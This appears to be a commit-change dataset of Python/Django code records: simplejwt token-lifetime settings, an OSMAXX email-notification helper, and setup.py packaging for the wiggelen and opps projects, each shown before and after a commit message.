'SLIDING_TOKEN_REFRESH_LIFETIME': timedelta(days=1),
'ACCESS_TOKEN_LIFETIME': timedelta(minutes=5),
'REFRESH_TOKEN_LIFETIME': timedelta(days=1),
'SECRET_KEY': settings.SECRET_KEY,
# Undocumented settings. Changing these may lead to unexpected behavior.
# Make sure you know what you're doing. These might become part of the
# public API eventually but that would require some adjustments.
'AUTH_TOKEN_CLASS': 'rest_framework_simplejwt.tokens.AccessToken',
'TOKEN_BACKEND_CLASS': 'rest_framework_simplejwt.backends.PythonJOSEBackend',
'ALGORITHM': 'HS256',
}
IMPORT_STRING_SETTINGS = (
'AUTH_TOKEN_CLASS',
'TOKEN_BACKEND_CLASS',
)
api_settings = APISettings(USER_SETTINGS, DEFAULTS, IMPORT_STRING_SETTINGS)
| <commit_before>from __future__ import unicode_literals
from datetime import timedelta
from django.conf import settings
from rest_framework.settings import APISettings
USER_SETTINGS = getattr(settings, 'SIMPLE_JWT', None)
DEFAULTS = {
'AUTH_HEADER_TYPE': 'Bearer',
'USER_ID_FIELD': 'id',
'USER_ID_CLAIM': 'user_id',
'TOKEN_TYPE_CLAIM': 'token_type',
'SLIDING_REFRESH_EXP_CLAIM': 'refresh_exp',
'SLIDING_TOKEN_LIFETIME': timedelta(days=1),
'SLIDING_TOKEN_REFRESH_LIFETIME': timedelta(days=3),
'ACCESS_TOKEN_LIFETIME': timedelta(minutes=5),
'REFRESH_TOKEN_LIFETIME': timedelta(days=1),
'SECRET_KEY': settings.SECRET_KEY,
# Undocumented settings. Changing these may lead to unexpected behavior.
# Make sure you know what you're doing. These might become part of the
# public API eventually but that would require some adjustments.
'AUTH_TOKEN_CLASS': 'rest_framework_simplejwt.tokens.AccessToken',
'TOKEN_BACKEND_CLASS': 'rest_framework_simplejwt.backends.PythonJOSEBackend',
'ALGORITHM': 'HS256',
}
IMPORT_STRING_SETTINGS = (
'AUTH_TOKEN_CLASS',
'TOKEN_BACKEND_CLASS',
)
api_settings = APISettings(USER_SETTINGS, DEFAULTS, IMPORT_STRING_SETTINGS)
<commit_msg>Make sliding token lifetime defaults a bit more conservative<commit_after>from __future__ import unicode_literals
from datetime import timedelta

from django.conf import settings
from rest_framework.settings import APISettings

# User-provided overrides, taken from the SIMPLE_JWT dict in the project's
# Django settings module (None when the project defines no such dict).
USER_SETTINGS = getattr(settings, 'SIMPLE_JWT', None)

# Default value for every supported setting; any key may be overridden
# through USER_SETTINGS above.
DEFAULTS = {
    # Expected prefix of the Authorization header ("Bearer <token>").
    'AUTH_HEADER_TYPE': 'Bearer',
    # User model field used to identify the token's owner, and the token
    # claim under which that field's value is stored.
    'USER_ID_FIELD': 'id',
    'USER_ID_CLAIM': 'user_id',
    # Claim recording which kind of token (access/refresh/sliding) this is.
    'TOKEN_TYPE_CLAIM': 'token_type',
    # Claim on sliding tokens holding the refresh deadline.
    'SLIDING_REFRESH_EXP_CLAIM': 'refresh_exp',
    'SLIDING_TOKEN_LIFETIME': timedelta(minutes=5),
    'SLIDING_TOKEN_REFRESH_LIFETIME': timedelta(days=1),
    'ACCESS_TOKEN_LIFETIME': timedelta(minutes=5),
    'REFRESH_TOKEN_LIFETIME': timedelta(days=1),
    # Signing key; defaults to the project's own SECRET_KEY.
    'SECRET_KEY': settings.SECRET_KEY,

    # Undocumented settings. Changing these may lead to unexpected behavior.
    # Make sure you know what you're doing. These might become part of the
    # public API eventually but that would require some adjustments.
    'AUTH_TOKEN_CLASS': 'rest_framework_simplejwt.tokens.AccessToken',
    'TOKEN_BACKEND_CLASS': 'rest_framework_simplejwt.backends.PythonJOSEBackend',
    'ALGORITHM': 'HS256',
}

# Settings whose string values are dotted import paths that DRF's
# APISettings resolves to the actual objects on first access.
IMPORT_STRING_SETTINGS = (
    'AUTH_TOKEN_CLASS',
    'TOKEN_BACKEND_CLASS',
)

api_settings = APISettings(USER_SETTINGS, DEFAULTS, IMPORT_STRING_SETTINGS)
|
1c9f3b95cca8439ec8c4a5a5cb1959e8b2edaff2 | osmaxx-py/excerptconverter/converter_helper.py | osmaxx-py/excerptconverter/converter_helper.py | from django.contrib import messages
from django.core.mail import send_mail
from django.utils.translation import ugettext_lazy as _
import stored_messages
from osmaxx.excerptexport import models
class ConverterHelper:
def __init__(self, extraction_order):
self.extraction_order = extraction_order
self.user = extraction_order.orderer
def file_conversion_finished(self):
if self.extraction_order.output_files.count() >= len(self.extraction_order.extraction_formats):
self.inform_user(
messages.SUCCESS,
_('The extraction of the order "%(order_id)s" has been finished.') % {
'order_id': self.extraction_order.id
},
email=True
)
self.extraction_order.state = models.ExtractionOrderState.FINISHED
self.extraction_order.save()
def inform_user(self, message_type, message_text, email=True):
stored_messages.api.add_message_for(
users=[self.user],
level=message_type,
message_text=message_text
)
if email:
if hasattr(self.user, 'email'):
send_mail(
'[OSMAXX] '+message_text,
message_text,
'no-reply@osmaxx.hsr.ch',
[self.user.email]
)
else:
self.inform_user(
messages.WARNING,
_("There is no email address assigned to your account. "
"You won't be notified by email on process finish!"),
email=False
)
| from django.contrib import messages
from django.core.mail import send_mail
from django.utils.translation import ugettext_lazy as _
import stored_messages
from osmaxx.excerptexport import models
# functions using database (extraction_order) must be instance methods of a class
# -> free functions will not work: database connection error
class ConverterHelper:
def __init__(self, extraction_order):
self.extraction_order = extraction_order
self.user = extraction_order.orderer
def file_conversion_finished(self):
if self.extraction_order.output_files.count() >= len(self.extraction_order.extraction_formats):
self.inform_user(
messages.SUCCESS,
_('The extraction of the order "%(order_id)s" has been finished.') % {
'order_id': self.extraction_order.id
},
email=True
)
self.extraction_order.state = models.ExtractionOrderState.FINISHED
self.extraction_order.save()
def inform_user(self, message_type, message_text, email=True):
stored_messages.api.add_message_for(
users=[self.user],
level=message_type,
message_text=message_text
)
if email:
if hasattr(self.user, 'email'):
send_mail(
'[OSMAXX] '+message_text,
message_text,
'no-reply@osmaxx.hsr.ch',
[self.user.email]
)
else:
self.inform_user(
messages.WARNING,
_("There is no email address assigned to your account. "
"You won't be notified by email on process finish!"),
email=False
)
| Document reason for class instead of free function | Document reason for class instead of free function
| Python | isc | geometalab/drf-utm-zone-info,geometalab/drf-utm-zone-info,geometalab/osmaxx-frontend,geometalab/osmaxx-frontend,geometalab/osmaxx,geometalab/osmaxx,geometalab/osmaxx-frontend,geometalab/osmaxx,geometalab/osmaxx-frontend,geometalab/osmaxx | from django.contrib import messages
from django.core.mail import send_mail
from django.utils.translation import ugettext_lazy as _
import stored_messages
from osmaxx.excerptexport import models
class ConverterHelper:
def __init__(self, extraction_order):
self.extraction_order = extraction_order
self.user = extraction_order.orderer
def file_conversion_finished(self):
if self.extraction_order.output_files.count() >= len(self.extraction_order.extraction_formats):
self.inform_user(
messages.SUCCESS,
_('The extraction of the order "%(order_id)s" has been finished.') % {
'order_id': self.extraction_order.id
},
email=True
)
self.extraction_order.state = models.ExtractionOrderState.FINISHED
self.extraction_order.save()
def inform_user(self, message_type, message_text, email=True):
stored_messages.api.add_message_for(
users=[self.user],
level=message_type,
message_text=message_text
)
if email:
if hasattr(self.user, 'email'):
send_mail(
'[OSMAXX] '+message_text,
message_text,
'no-reply@osmaxx.hsr.ch',
[self.user.email]
)
else:
self.inform_user(
messages.WARNING,
_("There is no email address assigned to your account. "
"You won't be notified by email on process finish!"),
email=False
)
Document reason for class instead of free function | from django.contrib import messages
from django.core.mail import send_mail
from django.utils.translation import ugettext_lazy as _
import stored_messages
from osmaxx.excerptexport import models
# functions using database (extraction_order) must be instance methods of a class
# -> free functions will not work: database connection error
class ConverterHelper:
def __init__(self, extraction_order):
self.extraction_order = extraction_order
self.user = extraction_order.orderer
def file_conversion_finished(self):
if self.extraction_order.output_files.count() >= len(self.extraction_order.extraction_formats):
self.inform_user(
messages.SUCCESS,
_('The extraction of the order "%(order_id)s" has been finished.') % {
'order_id': self.extraction_order.id
},
email=True
)
self.extraction_order.state = models.ExtractionOrderState.FINISHED
self.extraction_order.save()
def inform_user(self, message_type, message_text, email=True):
stored_messages.api.add_message_for(
users=[self.user],
level=message_type,
message_text=message_text
)
if email:
if hasattr(self.user, 'email'):
send_mail(
'[OSMAXX] '+message_text,
message_text,
'no-reply@osmaxx.hsr.ch',
[self.user.email]
)
else:
self.inform_user(
messages.WARNING,
_("There is no email address assigned to your account. "
"You won't be notified by email on process finish!"),
email=False
)
| <commit_before>from django.contrib import messages
from django.core.mail import send_mail
from django.utils.translation import ugettext_lazy as _
import stored_messages
from osmaxx.excerptexport import models
class ConverterHelper:
def __init__(self, extraction_order):
self.extraction_order = extraction_order
self.user = extraction_order.orderer
def file_conversion_finished(self):
if self.extraction_order.output_files.count() >= len(self.extraction_order.extraction_formats):
self.inform_user(
messages.SUCCESS,
_('The extraction of the order "%(order_id)s" has been finished.') % {
'order_id': self.extraction_order.id
},
email=True
)
self.extraction_order.state = models.ExtractionOrderState.FINISHED
self.extraction_order.save()
def inform_user(self, message_type, message_text, email=True):
stored_messages.api.add_message_for(
users=[self.user],
level=message_type,
message_text=message_text
)
if email:
if hasattr(self.user, 'email'):
send_mail(
'[OSMAXX] '+message_text,
message_text,
'no-reply@osmaxx.hsr.ch',
[self.user.email]
)
else:
self.inform_user(
messages.WARNING,
_("There is no email address assigned to your account. "
"You won't be notified by email on process finish!"),
email=False
)
<commit_msg>Document reason for class instead of free function<commit_after> | from django.contrib import messages
from django.core.mail import send_mail
from django.utils.translation import ugettext_lazy as _
import stored_messages
from osmaxx.excerptexport import models
# functions using database (extraction_order) must be instance methods of a class
# -> free functions will not work: database connection error
class ConverterHelper:
def __init__(self, extraction_order):
self.extraction_order = extraction_order
self.user = extraction_order.orderer
def file_conversion_finished(self):
if self.extraction_order.output_files.count() >= len(self.extraction_order.extraction_formats):
self.inform_user(
messages.SUCCESS,
_('The extraction of the order "%(order_id)s" has been finished.') % {
'order_id': self.extraction_order.id
},
email=True
)
self.extraction_order.state = models.ExtractionOrderState.FINISHED
self.extraction_order.save()
def inform_user(self, message_type, message_text, email=True):
stored_messages.api.add_message_for(
users=[self.user],
level=message_type,
message_text=message_text
)
if email:
if hasattr(self.user, 'email'):
send_mail(
'[OSMAXX] '+message_text,
message_text,
'no-reply@osmaxx.hsr.ch',
[self.user.email]
)
else:
self.inform_user(
messages.WARNING,
_("There is no email address assigned to your account. "
"You won't be notified by email on process finish!"),
email=False
)
| from django.contrib import messages
from django.core.mail import send_mail
from django.utils.translation import ugettext_lazy as _
import stored_messages
from osmaxx.excerptexport import models
class ConverterHelper:
def __init__(self, extraction_order):
self.extraction_order = extraction_order
self.user = extraction_order.orderer
def file_conversion_finished(self):
if self.extraction_order.output_files.count() >= len(self.extraction_order.extraction_formats):
self.inform_user(
messages.SUCCESS,
_('The extraction of the order "%(order_id)s" has been finished.') % {
'order_id': self.extraction_order.id
},
email=True
)
self.extraction_order.state = models.ExtractionOrderState.FINISHED
self.extraction_order.save()
def inform_user(self, message_type, message_text, email=True):
stored_messages.api.add_message_for(
users=[self.user],
level=message_type,
message_text=message_text
)
if email:
if hasattr(self.user, 'email'):
send_mail(
'[OSMAXX] '+message_text,
message_text,
'no-reply@osmaxx.hsr.ch',
[self.user.email]
)
else:
self.inform_user(
messages.WARNING,
_("There is no email address assigned to your account. "
"You won't be notified by email on process finish!"),
email=False
)
Document reason for class instead of free functionfrom django.contrib import messages
from django.core.mail import send_mail
from django.utils.translation import ugettext_lazy as _
import stored_messages
from osmaxx.excerptexport import models
# functions using database (extraction_order) must be instance methods of a class
# -> free functions will not work: database connection error
class ConverterHelper:
def __init__(self, extraction_order):
self.extraction_order = extraction_order
self.user = extraction_order.orderer
def file_conversion_finished(self):
if self.extraction_order.output_files.count() >= len(self.extraction_order.extraction_formats):
self.inform_user(
messages.SUCCESS,
_('The extraction of the order "%(order_id)s" has been finished.') % {
'order_id': self.extraction_order.id
},
email=True
)
self.extraction_order.state = models.ExtractionOrderState.FINISHED
self.extraction_order.save()
def inform_user(self, message_type, message_text, email=True):
stored_messages.api.add_message_for(
users=[self.user],
level=message_type,
message_text=message_text
)
if email:
if hasattr(self.user, 'email'):
send_mail(
'[OSMAXX] '+message_text,
message_text,
'no-reply@osmaxx.hsr.ch',
[self.user.email]
)
else:
self.inform_user(
messages.WARNING,
_("There is no email address assigned to your account. "
"You won't be notified by email on process finish!"),
email=False
)
| <commit_before>from django.contrib import messages
from django.core.mail import send_mail
from django.utils.translation import ugettext_lazy as _
import stored_messages
from osmaxx.excerptexport import models
class ConverterHelper:
def __init__(self, extraction_order):
self.extraction_order = extraction_order
self.user = extraction_order.orderer
def file_conversion_finished(self):
if self.extraction_order.output_files.count() >= len(self.extraction_order.extraction_formats):
self.inform_user(
messages.SUCCESS,
_('The extraction of the order "%(order_id)s" has been finished.') % {
'order_id': self.extraction_order.id
},
email=True
)
self.extraction_order.state = models.ExtractionOrderState.FINISHED
self.extraction_order.save()
def inform_user(self, message_type, message_text, email=True):
stored_messages.api.add_message_for(
users=[self.user],
level=message_type,
message_text=message_text
)
if email:
if hasattr(self.user, 'email'):
send_mail(
'[OSMAXX] '+message_text,
message_text,
'no-reply@osmaxx.hsr.ch',
[self.user.email]
)
else:
self.inform_user(
messages.WARNING,
_("There is no email address assigned to your account. "
"You won't be notified by email on process finish!"),
email=False
)
<commit_msg>Document reason for class instead of free function<commit_after>from django.contrib import messages
from django.core.mail import send_mail
from django.utils.translation import ugettext_lazy as _
import stored_messages
from osmaxx.excerptexport import models
# functions using database (extraction_order) must be instance methods of a class
# -> free functions will not work: database connection error
class ConverterHelper:
    """Notification helpers for an extraction order's conversion progress.

    Kept as a class (rather than free functions) because, per the module
    comment above, functions touching the database must be instance methods.
    """

    def __init__(self, extraction_order):
        # The order being converted and the user who placed it.
        self.extraction_order = extraction_order
        self.user = extraction_order.orderer

    def file_conversion_finished(self):
        """Mark the order FINISHED and notify the orderer, but only once
        at least one output file exists per requested extraction format.
        """
        if self.extraction_order.output_files.count() >= len(self.extraction_order.extraction_formats):
            self.inform_user(
                messages.SUCCESS,
                _('The extraction of the order "%(order_id)s" has been finished.') % {
                    'order_id': self.extraction_order.id
                },
                email=True
            )
            self.extraction_order.state = models.ExtractionOrderState.FINISHED
            self.extraction_order.save()

    def inform_user(self, message_type, message_text, email=True):
        """Store a message for the user and optionally deliver it by email.

        :param message_type: a django.contrib.messages level (e.g. SUCCESS)
        :param message_text: the message body
        :param email: when True, also attempt delivery via send_mail
        """
        stored_messages.api.add_message_for(
            users=[self.user],
            level=message_type,
            message_text=message_text
        )
        if email:
            # NOTE(review): hasattr() is presumably always True for Django's
            # default User model even when the address is empty -- this
            # probably should also check that self.user.email is non-empty;
            # confirm against the user model in use.
            if hasattr(self.user, 'email'):
                send_mail(
                    '[OSMAXX] '+message_text,
                    message_text,
                    'no-reply@osmaxx.hsr.ch',
                    [self.user.email]
                )
            else:
                # No address available: leave a stored warning instead.
                # email=False prevents infinite recursion here.
                self.inform_user(
                    messages.WARNING,
                    _("There is no email address assigned to your account. "
                      "You won't be notified by email on process finish!"),
                    email=False
                )
|
010416fd3888aeae2ab0b50a5d9b02ad23f5cab3 | setup.py | setup.py | import sys
from setuptools import setup
if sys.version_info < (2, 6):
raise Exception('Wiggelen requires Python 2.6 or higher.')
# Todo: How does this play with pip freeze requirement files?
requires = ['nose']
# Python 2.6 does not include the argparse module.
try:
import argparse
except ImportError:
requires.append('argparse')
import wiggelen as distmeta
setup(
name='wiggelen',
version=distmeta.__version__,
description='Working with wiggle tracks in Python',
long_description=distmeta.__doc__,
author=distmeta.__author__,
author_email=distmeta.__contact__,
url=distmeta.__homepage__,
license='MIT License',
platforms=['any'],
packages=['wiggelen'],
requires=requires,
entry_points = {
'console_scripts': ['wiggelen = wiggelen.commands:main']
},
classifiers = [
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Scientific/Engineering',
],
keywords='bioinformatics'
)
| import sys
from setuptools import setup
if sys.version_info < (2, 6):
raise Exception('Wiggelen requires Python 2.6 or higher.')
# Todo: How does this play with pip freeze requirement files?
requires = ['nose']
# Python 2.6 does not include the argparse module.
try:
import argparse
except ImportError:
requires.append('argparse')
with open('README.rst') as readme:
long_description = readme.read()
import wiggelen as distmeta
setup(
name='wiggelen',
version=distmeta.__version__,
description='Working with wiggle tracks in Python',
long_description=long_description,
author=distmeta.__author__,
author_email=distmeta.__contact__,
url=distmeta.__homepage__,
license='MIT License',
platforms=['any'],
packages=['wiggelen'],
requires=requires,
entry_points = {
'console_scripts': ['wiggelen = wiggelen.commands:main']
},
classifiers = [
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Scientific/Engineering',
],
keywords='bioinformatics'
)
| Use README.rst as long description for PyPi | Use README.rst as long description for PyPi
| Python | mit | martijnvermaat/wiggelen | import sys
from setuptools import setup
if sys.version_info < (2, 6):
raise Exception('Wiggelen requires Python 2.6 or higher.')
# Todo: How does this play with pip freeze requirement files?
requires = ['nose']
# Python 2.6 does not include the argparse module.
try:
import argparse
except ImportError:
requires.append('argparse')
import wiggelen as distmeta
setup(
name='wiggelen',
version=distmeta.__version__,
description='Working with wiggle tracks in Python',
long_description=distmeta.__doc__,
author=distmeta.__author__,
author_email=distmeta.__contact__,
url=distmeta.__homepage__,
license='MIT License',
platforms=['any'],
packages=['wiggelen'],
requires=requires,
entry_points = {
'console_scripts': ['wiggelen = wiggelen.commands:main']
},
classifiers = [
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Scientific/Engineering',
],
keywords='bioinformatics'
)
Use README.rst as long description for PyPi | import sys
from setuptools import setup
if sys.version_info < (2, 6):
raise Exception('Wiggelen requires Python 2.6 or higher.')
# Todo: How does this play with pip freeze requirement files?
requires = ['nose']
# Python 2.6 does not include the argparse module.
try:
import argparse
except ImportError:
requires.append('argparse')
with open('README.rst') as readme:
long_description = readme.read()
import wiggelen as distmeta
setup(
name='wiggelen',
version=distmeta.__version__,
description='Working with wiggle tracks in Python',
long_description=long_description,
author=distmeta.__author__,
author_email=distmeta.__contact__,
url=distmeta.__homepage__,
license='MIT License',
platforms=['any'],
packages=['wiggelen'],
requires=requires,
entry_points = {
'console_scripts': ['wiggelen = wiggelen.commands:main']
},
classifiers = [
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Scientific/Engineering',
],
keywords='bioinformatics'
)
| <commit_before>import sys
from setuptools import setup
if sys.version_info < (2, 6):
raise Exception('Wiggelen requires Python 2.6 or higher.')
# Todo: How does this play with pip freeze requirement files?
requires = ['nose']
# Python 2.6 does not include the argparse module.
try:
import argparse
except ImportError:
requires.append('argparse')
import wiggelen as distmeta
setup(
name='wiggelen',
version=distmeta.__version__,
description='Working with wiggle tracks in Python',
long_description=distmeta.__doc__,
author=distmeta.__author__,
author_email=distmeta.__contact__,
url=distmeta.__homepage__,
license='MIT License',
platforms=['any'],
packages=['wiggelen'],
requires=requires,
entry_points = {
'console_scripts': ['wiggelen = wiggelen.commands:main']
},
classifiers = [
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Scientific/Engineering',
],
keywords='bioinformatics'
)
<commit_msg>Use README.rst as long description for PyPi<commit_after> | import sys
from setuptools import setup
if sys.version_info < (2, 6):
raise Exception('Wiggelen requires Python 2.6 or higher.')
# Todo: How does this play with pip freeze requirement files?
requires = ['nose']
# Python 2.6 does not include the argparse module.
try:
import argparse
except ImportError:
requires.append('argparse')
with open('README.rst') as readme:
long_description = readme.read()
import wiggelen as distmeta
setup(
name='wiggelen',
version=distmeta.__version__,
description='Working with wiggle tracks in Python',
long_description=long_description,
author=distmeta.__author__,
author_email=distmeta.__contact__,
url=distmeta.__homepage__,
license='MIT License',
platforms=['any'],
packages=['wiggelen'],
requires=requires,
entry_points = {
'console_scripts': ['wiggelen = wiggelen.commands:main']
},
classifiers = [
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Scientific/Engineering',
],
keywords='bioinformatics'
)
| import sys
from setuptools import setup
if sys.version_info < (2, 6):
raise Exception('Wiggelen requires Python 2.6 or higher.')
# Todo: How does this play with pip freeze requirement files?
requires = ['nose']
# Python 2.6 does not include the argparse module.
try:
import argparse
except ImportError:
requires.append('argparse')
import wiggelen as distmeta
setup(
name='wiggelen',
version=distmeta.__version__,
description='Working with wiggle tracks in Python',
long_description=distmeta.__doc__,
author=distmeta.__author__,
author_email=distmeta.__contact__,
url=distmeta.__homepage__,
license='MIT License',
platforms=['any'],
packages=['wiggelen'],
requires=requires,
entry_points = {
'console_scripts': ['wiggelen = wiggelen.commands:main']
},
classifiers = [
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Scientific/Engineering',
],
keywords='bioinformatics'
)
Use README.rst as long description for PyPiimport sys
from setuptools import setup
if sys.version_info < (2, 6):
raise Exception('Wiggelen requires Python 2.6 or higher.')
# Todo: How does this play with pip freeze requirement files?
requires = ['nose']
# Python 2.6 does not include the argparse module.
try:
import argparse
except ImportError:
requires.append('argparse')
with open('README.rst') as readme:
long_description = readme.read()
import wiggelen as distmeta
setup(
name='wiggelen',
version=distmeta.__version__,
description='Working with wiggle tracks in Python',
long_description=long_description,
author=distmeta.__author__,
author_email=distmeta.__contact__,
url=distmeta.__homepage__,
license='MIT License',
platforms=['any'],
packages=['wiggelen'],
requires=requires,
entry_points = {
'console_scripts': ['wiggelen = wiggelen.commands:main']
},
classifiers = [
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Scientific/Engineering',
],
keywords='bioinformatics'
)
| <commit_before>import sys
from setuptools import setup
if sys.version_info < (2, 6):
raise Exception('Wiggelen requires Python 2.6 or higher.')
# Todo: How does this play with pip freeze requirement files?
requires = ['nose']
# Python 2.6 does not include the argparse module.
try:
import argparse
except ImportError:
requires.append('argparse')
import wiggelen as distmeta
setup(
name='wiggelen',
version=distmeta.__version__,
description='Working with wiggle tracks in Python',
long_description=distmeta.__doc__,
author=distmeta.__author__,
author_email=distmeta.__contact__,
url=distmeta.__homepage__,
license='MIT License',
platforms=['any'],
packages=['wiggelen'],
requires=requires,
entry_points = {
'console_scripts': ['wiggelen = wiggelen.commands:main']
},
classifiers = [
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Scientific/Engineering',
],
keywords='bioinformatics'
)
<commit_msg>Use README.rst as long description for PyPi<commit_after>import sys
from setuptools import setup
if sys.version_info < (2, 6):
raise Exception('Wiggelen requires Python 2.6 or higher.')
# Todo: How does this play with pip freeze requirement files?
requires = ['nose']
# Python 2.6 does not include the argparse module.
try:
import argparse
except ImportError:
requires.append('argparse')
with open('README.rst') as readme:
long_description = readme.read()
import wiggelen as distmeta
setup(
name='wiggelen',
version=distmeta.__version__,
description='Working with wiggle tracks in Python',
long_description=long_description,
author=distmeta.__author__,
author_email=distmeta.__contact__,
url=distmeta.__homepage__,
license='MIT License',
platforms=['any'],
packages=['wiggelen'],
requires=requires,
entry_points = {
'console_scripts': ['wiggelen = wiggelen.commands:main']
},
classifiers = [
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Scientific/Engineering',
],
keywords='bioinformatics'
)
|
efd13e069e7fa986f7fe68dfe5dc5256cfc68750 | setup.py | setup.py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
from setuptools import setup, find_packages
import opps
install_requires = ["Django>=1.4", "south>=0.7"]
classifiers = ["Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Framework :: Django",
'Programming Language :: Python',
"Programming Language :: Python :: 2.7",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content",
'Topic :: Software Development :: Libraries :: Python Modules',]
try:
long_description = open('README.md').read()
except:
long_description = opps.__description__
setup(name='opps',
version = opps.__version__,
description = opps.__description__,
long_description = long_description,
classifiers = classifiers,
keywords = 'opps cms django apps magazines websites',
author = opps.__author__,
author_email = opps.__email__,
url = 'http://oppsproject.org',
download_url = "https://github.com/avelino/opps/tarball/master",
license = opps.__license__,
packages = find_packages(exclude=('doc',)),
package_dir = {'opps': 'opps'},
install_requires = install_requires,
include_package_data = True,
)
| #!/usr/bin/env python
# -*- coding:utf-8 -*-
from setuptools import setup, find_packages
import opps
install_requires = ["Django>=1.5",
"south>=0.7",
"Pillow==1.7.8",
"django-filebrowser==3.5.1",
"django-redis",
"django-redactor"]
classifiers = ["Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Framework :: Django",
'Programming Language :: Python',
"Programming Language :: Python :: 2.7",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content",
'Topic :: Software Development :: Libraries :: Python Modules',]
try:
long_description = open('README.md').read()
except:
long_description = opps.__description__
setup(name='opps',
version = opps.__version__,
description = opps.__description__,
long_description = long_description,
classifiers = classifiers,
keywords = 'opps cms django apps magazines websites',
author = opps.__author__,
author_email = opps.__email__,
url = 'http://oppsproject.org',
download_url = "https://github.com/avelino/opps/tarball/master",
license = opps.__license__,
packages = find_packages(exclude=('doc',)),
package_dir = {'opps': 'opps'},
install_requires = install_requires,
include_package_data = True,
)
| Add new libs python on install requires Opps CMS | Add new libs python on install requires Opps CMS
| Python | mit | YACOWS/opps,opps/opps,YACOWS/opps,jeanmask/opps,jeanmask/opps,YACOWS/opps,opps/opps,williamroot/opps,williamroot/opps,jeanmask/opps,jeanmask/opps,williamroot/opps,opps/opps,YACOWS/opps,williamroot/opps,opps/opps | #!/usr/bin/env python
# -*- coding:utf-8 -*-
from setuptools import setup, find_packages
import opps
install_requires = ["Django>=1.4", "south>=0.7"]
classifiers = ["Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Framework :: Django",
'Programming Language :: Python',
"Programming Language :: Python :: 2.7",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content",
'Topic :: Software Development :: Libraries :: Python Modules',]
try:
long_description = open('README.md').read()
except:
long_description = opps.__description__
setup(name='opps',
version = opps.__version__,
description = opps.__description__,
long_description = long_description,
classifiers = classifiers,
keywords = 'opps cms django apps magazines websites',
author = opps.__author__,
author_email = opps.__email__,
url = 'http://oppsproject.org',
download_url = "https://github.com/avelino/opps/tarball/master",
license = opps.__license__,
packages = find_packages(exclude=('doc',)),
package_dir = {'opps': 'opps'},
install_requires = install_requires,
include_package_data = True,
)
Add new libs python on install requires Opps CMS | #!/usr/bin/env python
# -*- coding:utf-8 -*-
from setuptools import setup, find_packages
import opps
install_requires = ["Django>=1.5",
"south>=0.7",
"Pillow==1.7.8",
"django-filebrowser==3.5.1",
"django-redis",
"django-redactor"]
classifiers = ["Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Framework :: Django",
'Programming Language :: Python',
"Programming Language :: Python :: 2.7",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content",
'Topic :: Software Development :: Libraries :: Python Modules',]
try:
long_description = open('README.md').read()
except:
long_description = opps.__description__
setup(name='opps',
version = opps.__version__,
description = opps.__description__,
long_description = long_description,
classifiers = classifiers,
keywords = 'opps cms django apps magazines websites',
author = opps.__author__,
author_email = opps.__email__,
url = 'http://oppsproject.org',
download_url = "https://github.com/avelino/opps/tarball/master",
license = opps.__license__,
packages = find_packages(exclude=('doc',)),
package_dir = {'opps': 'opps'},
install_requires = install_requires,
include_package_data = True,
)
| <commit_before>#!/usr/bin/env python
# -*- coding:utf-8 -*-
from setuptools import setup, find_packages
import opps
install_requires = ["Django>=1.4", "south>=0.7"]
classifiers = ["Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Framework :: Django",
'Programming Language :: Python',
"Programming Language :: Python :: 2.7",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content",
'Topic :: Software Development :: Libraries :: Python Modules',]
try:
long_description = open('README.md').read()
except:
long_description = opps.__description__
setup(name='opps',
version = opps.__version__,
description = opps.__description__,
long_description = long_description,
classifiers = classifiers,
keywords = 'opps cms django apps magazines websites',
author = opps.__author__,
author_email = opps.__email__,
url = 'http://oppsproject.org',
download_url = "https://github.com/avelino/opps/tarball/master",
license = opps.__license__,
packages = find_packages(exclude=('doc',)),
package_dir = {'opps': 'opps'},
install_requires = install_requires,
include_package_data = True,
)
<commit_msg>Add new libs python on install requires Opps CMS<commit_after> | #!/usr/bin/env python
# -*- coding:utf-8 -*-
from setuptools import setup, find_packages
import opps
install_requires = ["Django>=1.5",
"south>=0.7",
"Pillow==1.7.8",
"django-filebrowser==3.5.1",
"django-redis",
"django-redactor"]
classifiers = ["Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
